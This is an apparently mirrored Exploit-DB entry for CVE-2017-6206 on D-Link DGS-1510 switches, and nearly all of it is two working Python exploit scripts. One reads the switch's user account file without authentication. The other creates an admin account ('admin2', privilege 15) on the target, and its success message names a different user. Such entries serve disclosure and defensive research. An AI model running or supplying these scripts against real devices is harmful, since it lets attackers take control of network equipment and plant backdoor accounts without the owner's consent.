- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 41662
- Проверка EDB
-
- Пройдено
- Автор
- VARANG AMIN
- Тип уязвимости
- WEBAPPS
- Платформа
- HARDWARE
- CVE
- cve-2017-6206
- Дата публикации
- 2017-03-20
D-Link DGS-1510 - Multiple Vulnerabilities
Код:
================
get-user-info.py
================
import re
import os.path
import urllib2
import base64
import gzip
import zlib
from StringIO import StringIO
from io import BytesIO
def make_requests():
"""Calls request functions sequentially."""
response = [None]
responseText = None
if(request_ip(response)):
# Success, possibly use response.
responseText = read_response(response[0])
print responseText
response[0].close()
else:
# Failure, cannot use response.
pass
def read_response(response):
""" Returns the text contained in the response. For example, the page HTML. Only handles the most common HTTP encodings."""
if response.info().get('Content-Encoding') == 'gzip':
buf = StringIO(response.read())
return gzip.GzipFile(fileobj=buf).read()
elif response.info().get('Content-Encoding') == 'deflate':
decompress = zlib.decompressobj(-zlib.MAX_WBITS)
inflated = decompress.decompress(response.read())
inflated += decompress.flush()
return inflated
return response.read()
def request_ip(response):
"""Tries to request the URL. Returns True if the request was successful; false otherwise.
http://ip_address/DataStore/990_user_account.js?index=0&pagesize=10
response -- After the function has finished, will possibly contain the response to the request.
"""
response[0] = None
try:
# Create request to URL.
import sys
ip = sys.argv[1]
print ip
req = urllib2.Request("http://%s/DataStore/990_user_account.js?index=0&pagesize=10"% ip)
# Set request headers.
req.add_header("Connection", "keep-alive")
req.add_header("Accept", "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01")
req.add_header("X-Requested-With", "XMLHttpRequest")
req.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.59 Safari/537.36")
req.add_header("Referer", "http://%s/www/login.html"% ip)
req.add_header("Accept-Encoding", "gzip, deflate, sdch")
req.add_header("Accept-Language", "en-US,en;q=0.8")
req.add_header("Cookie", "Language=en")
# Get response to request.
response[0] = urllib2.urlopen(req)
except urllib2.URLError, e:
# URLError.code existing indicates a valid HTTP response, but with a non-200 status code (e.g. 304 Not Modified, 404 Not Found)
if not hasattr(e, "code"):
return False
response[0] = e
except:
return False
return True
make_requests()
===========
user_add.py
===========
import re
import os.path
import urllib2
import base64
import gzip
import zlib
from StringIO import StringIO
from io import BytesIO
def make_requests():
"""Calls request functions sequentially."""
response = [None]
responseText = None
if(request_ip(response)):
# Success, possibly use response.
responseText = read_response(response[0])
print "Username dlinktest is successfully Added"
response[0].close()
else:
# Failure, cannot use response.
print "locha"
pass
def read_response(response):
""" Returns the text contained in the response. For example, the page HTML. Only handles the most common HTTP encodings."""
if response.info().get('Content-Encoding') == 'gzip':
buf = StringIO(response.read())
return gzip.GzipFile(fileobj=buf).read()
elif response.info().get('Content-Encoding') == 'deflate':
decompress = zlib.decompressobj(-zlib.MAX_WBITS)
inflated = decompress.decompress(response.read())
inflated += decompress.flush()
return inflated
return response.read()
def request_ip(response):
"""Tries to request the URL. Returns True if the request was successful; false otherwise.
http://ip_address/form/User_Accounts_Apply
response -- After the function has finished, will possibly contain the response to the request.
"""
response[0] = None
try:
# Create request to URL.
import sys
ip = sys.argv[1]
req = urllib2.Request("http://%s/form/User_Accounts_Apply"% ip)
# Set request headers.
req.add_header("Connection", "keep-alive")
req.add_header("Cache-Control", "max-age=0")
req.add_header("Origin", "http://%s/"% ip)
req.add_header("Upgrade-Insecure-Requests", "1")
req.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.51 Safari/537.36")
req.add_header("Content-Type", "application/x-www-form-urlencoded")
req.add_header("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8")
req.add_header("Referer", "http://%s/www/login.html"% ip)
req.add_header("Accept-Encoding", "gzip, deflate")
req.add_header("Accept-Language", "en-US,en;q=0.8")
# Set request body.
body = "action=0&username=admin2&privilege=15&type=0&password=admin2"
# Get response to request.
response[0] = urllib2.urlopen(req, body)
except urllib2.URLError, e:
# URLError.code existing indicates a valid HTTP response, but with a non-200 status code (e.g. 304 Not Modified, 404 Not Found)
if not hasattr(e, "code"):
return False
response[0] = e
except:
return False
return True
make_requests()- Источник
- www.exploit-db.com
